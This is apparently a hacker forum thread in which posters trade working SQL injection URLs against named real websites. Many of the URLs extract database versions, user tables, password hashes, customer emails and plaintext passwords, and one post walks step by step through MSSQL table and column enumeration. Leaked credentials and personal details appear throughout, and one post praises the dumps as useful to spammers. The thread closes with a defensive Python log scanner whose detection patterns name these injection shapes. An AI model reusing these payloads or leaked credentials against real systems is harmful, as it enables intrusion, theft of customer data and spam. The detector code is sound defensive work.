No, this is definitely not a custom-written script: if you enter inurl:"attorneys_bio.php" into Google, it returns about 20 links, and almost all of them will have the SQL injection.
Code: http://www.ufo.com.br/bonus.php?id=-8+union+select+1,2,version()+admin/*
Code: http://www.menestrersgascons.com/francais/groupesmusicaux/bonus.php?id=-5+union+select+1,2,VERSION(),4,5,6,7,8,9/*
Code: http://www.kujtesa.com/bs.php?id=-33+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14/*
Mambo component Portfolio Manager 1.0 Code: http://www.inta.org/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/* (c) it's my
Here are a couple of .edu sites with PR=6 =)
_http://experts.uchicago.edu/experts.php?id=99999+union+select+1,2,3,4,VERSION(),6,USER(),DATABASE(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
Worked it out by hand =)
_http://wandp.american.edu/pages.php?ID=99999+union+select+1,2,3,4/*
Something odd going on here...
http://www.thedietplate.us/products.php?cat=-99991%2527%2520+union+select+version()/* 4.1.22-standard
One more: _http://lapa.princeton.edu/peopledetail.php?ID=99999+union+select+1,2,3,4,VERSION(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*
There, MySQL version 5 already: _http://www.geology.ohio-state.edu/faculty_bios.php?id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
2 x88x: why is it odd? Everything is fine _http://wandp.american.edu/pages.php?ID=-5+union+select+1,aes_decrypt(aes_encrypt(user,0x71),0x71),aes_decrypt(aes_encrypt(password,0x71),0x71),4+from+mysql.user/* root *ADDF07FCC8E37371B887F38314C77A2FA4BC71CE
Filter bypass - HTML: http://wandp.american.edu/pages.php?ID=99999+union+select+1,2,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),4/*
PR-6. http://www.ochenk.com/entry.php?id=-63+union+select+1,concat_ws(0x3A3a,version(),database(),user()),3,4/*
I didn't try to do anything more, too lazy)) You're on your own from there... whoever needs it will do it)) I just found an SQL injection and decided to post it)) Good luck...
http://www.warcraftrealms.com/census.php?serverid=-298+union+select+table_name,2+from+information_schema.tables/*
http://www.warcraftrealms.com/census.php?serverid=-298+union+select+column_name,2+from+information_schema.columns/*
brassmedia.com Code: http://www.brassmedia.com/press/?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user(),database()),5,6,7,8,9,10,11,12,13/* 5.0.22[email protected]brass_media Code: http://www.brassmedia.com/press/?id=-1+union+select+1,2,3,concat_ws(0x3,user_id,first_name,last_name,password),5,6,7,8,9,10,11,12,13+from+brass_magazine.brasscu_user_accounts/* [email protected]frederickbrozyna jrhardrunner http://brassmedia.serveftp.net/index.asp
4.1.9 ----------------------------------------------------- 5.0.24a-standard-log ----------------------------------------------------- 4.0.18-log couldn't find the login, pass:s0o2r3z ----------------------------------------------------- 4.1.12-STANDARD ----------------------------------------------------- 4.0.27-standard-log
Code: http://sify.com/astrology/fullstory.php?id=-14166076+union+select+0,7,3,concat(userid,0x3,password),5,6,7,8,9,0,0,2,3,4,5,6,7,8+from+users/* akbar_babars0o2r3z maybe this one
Heh, for a spammer I'm simply a gold mine of fresh email addresses, here you go, in short we collect them, the databases are simply huge (not everywhere of course, but mostly there's a lot)
HTML: http://www.amenbeads.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
HTML: http://www.wallables.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
HTML: http://kissedbyangels.com/oscommerce/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
HTML: http://www.chibabogu.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
HTML: http://www.dvbhardware.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
HTML: http://www.diggorypress.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
HTML: http://www.foreverpets.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
HTML: http://www.energysavingworld.co.uk/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
Parse them while they're still warm, or you won't make it in time, they'll go cold
Mambo Component Material Suche 1.0 Code: http://www.berufsvorbereitung-medien.org/index.php?option=com_materialsuche&Itemid=70&tsk=detail&id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),null,null,7,null,9,null,null,null,null,14,null,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/* I didn't find any more sites with this bug =/
Anyway, an SQL injection:
Code: http://www.newspress.fr/index.asp?lang='+or+1
db_name: newspress sys_user :newspress_user version:Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Table names:
Code: 'ACCESPRESSE','addr','ADFP_CAT_IDS','ADFP_QUA_IDS', 'Adresse_Web','ALERT_COMM','algorithm','APPNAME','ARCHIVEDON','ARGUS_CAT_IDS','ARGUS_TEM_IDS','auid','backuplsn','BEGINDATE','bin_data','binary_message_body','bit_data','bitlength','bitposint','bitposleaf','brkrinst','CARNET','CARTE_ID','CAT_ID','CAT_IDS','Categorie_Titre','CATID','CCLIC','CDAYS','CDISP','cert','Chaine','chk','USERS'
We take a table and work out the column names (example for the LOG table):
Code: http://www.newspress.fr/index.asp?lang='+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='LOG'+AND+COLUMN_NAME+NOT+IN+('addr','xxx',))--
Having found the column we need, for example addr, we output it:
Code: http://www.newspress.fr/index.asp?lang='+or+1=(SELECT+TOP+1+addr+from+LOG)--
The article by [cash] helped a lot in finding and using this: http://forum.antichat.ru/threadnav30501-1-10.html
Joomla Component Artist
Code: http://www.tremplin-avenir.com/index.php?option=com_artist&task=view_artist_file&artistId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.dymok.net/index.php?option=com_artist&task=show_artist&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.aarte.net/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/*
Three different vulnerable parameters
Added:
Code: http://www.hanoiguesthouse.net/index.php?option=com_list&city=-1+union+select+1,2,3,concat(version()),5,6,7,8,9,10/*
Hoster: elabhosting.com
Code: http://www.elabhosting.com/subtopic.php?id=99999'+union+select+1,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4+from+users+limit+1,1/*
Tables and fields that I worked out:
HTML: users email password first_name last_name domains server id name
And here is the admin:
First Name: Wael Last Name: Elkadi pass: william [email protected]
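For defenders, the request shapes that recur in this thread (UNION SELECT with a trailing comment, information_schema enumeration, the MSSQL `SELECT TOP 1` subquery, double-encoded quotes such as `%2527`) can be flagged in web-server access logs. The following is an added example, not part of the original thread; the rule names, the bare request-line log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Signatures modelled on the request shapes posted in this thread (rule names are hypothetical).
RULES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "mssql_top1_subquery": re.compile(r"\(\s*select\s+top\s+1\b"),
    "info_function": re.compile(r"\b(version|user|database)\s*\(\s*\)"),
    "comment_terminator": re.compile(r"(/\*|--)\s*$"),
}
# Weak rules only add context; on their own they are too noisy to alert on.
WEAK = {"info_function", "comment_terminator"}

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so double encoding (%2527 -> %27 -> ') is unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(request_line):
    """Return the sorted names of the rules matched by one request line's query string."""
    parts = request_line.split()
    target = parts[1] if len(parts) >= 2 else request_line
    query = decode_fully(urlsplit(target).query).lower()
    return sorted(name for name, rx in RULES.items() if rx.search(query))

def suspicious(lines):
    """Keep only the lines that match at least one strong (non-weak) rule."""
    hits = [(line, classify(line)) for line in lines]
    return [(line, rules) for line, rules in hits if set(rules) - WEAK]

# Constructed request lines for a hypothetical site; not taken from any real log.
SAMPLE_LOG = [
    "GET /bonus.php?id=-8+union+select+1,2,version()/* HTTP/1.1",
    "GET /products.php?cat=-1%2527+union+select+version()/* HTTP/1.1",
    "GET /census.php?serverid=-2+union+select+table_name,2+from+information_schema.tables/* HTTP/1.1",
    "GET /index.asp?lang='+or+1=(SELECT+TOP+1+addr+from+LOG)-- HTTP/1.1",
    "GET /bonus.php?id=8 HTTP/1.1",
    "GET /search.php?q=student+union+events HTTP/1.1",
]

if __name__ == "__main__":
    for line, rules in suspicious(SAMPLE_LOG):
        print(", ".join(rules), "<-", line)
```

Matching like this is a triage aid for logs; the fix on the application side is parameterized queries, so that a value such as `id` is never parsed as SQL.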